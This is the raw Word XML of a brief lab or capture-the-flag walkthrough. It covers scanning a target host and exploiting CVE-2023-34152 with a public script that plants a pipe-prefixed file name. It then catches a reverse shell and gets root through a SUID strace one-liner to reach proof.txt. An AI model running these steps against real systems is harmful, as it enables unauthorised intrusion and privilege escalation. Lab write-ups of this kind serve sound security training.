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E654866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9F7028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image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1183715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9F7028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV t-Ip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66E28D8E" w:rsidR="00843DCE" w:rsidRDefault="009F7028" w:rsidP="00843DCE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An nmap scan tells me we’re working with ports 22 and 80. An apache webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28844338" w14:textId="7A00E3D0" w:rsidR="009F7028" w:rsidRDefault="009F7028" w:rsidP="00843DCE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dirsearch -u http://192.168.118.178/ -r -t 50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376ADE05" w14:textId="77777777" w:rsid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As always, one should over-use Google, especially on these footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D437DE" w14:textId="77777777" w:rsidR="009F7028" w:rsidRP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There are several 20216-related exploits, but CVE-2023–34152 seems like a quick try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6FEF26" w14:textId="77777777" w:rsid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Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A368B27" w14:textId="77777777" w:rsidR="009F7028" w:rsidRP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I googled the CVE number and found the below exploit as the first result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298524DF" w14:textId="77777777" w:rsidR="009F7028" w:rsidRP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If you find an RCE that matches a version name and number of a tool in a box, just try it.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3541712A" w14:textId="77777777" w:rsidR="009F7028" w:rsidRP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python3 CVE-2023–34152.py -l &lt;localhost&gt; -p &lt;localport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F1DCB" w14:textId="77777777" w:rsidR="009F7028" w:rsidRP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There’s a file with a weird file name generated: starts with “|en”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23600235" w14:textId="1CD04730" w:rsidR="009F7028" w:rsidRDefault="009F7028" w:rsidP="009F7028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Upload that and set up a listener to catch the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D651021" w14:textId="25540567" w:rsidR="009F7028" w:rsidRDefault="009F7028" w:rsidP="009F7028">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We are www-data, and the foothold flag is in /var/www/, www-data’s home directory.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13080BCB" w:rsidR="00843DCE" w:rsidRDefault="009F7028" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strace -o /dev/null /bin/sh -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD2F86" w14:textId="10A4CD9C" w:rsidR="009F7028" w:rsidRDefault="009F70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and its provide the shell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5ED4CFA" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="009F7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/root there ahs proof.txt is located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757ACB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009F7028"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-03T17:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>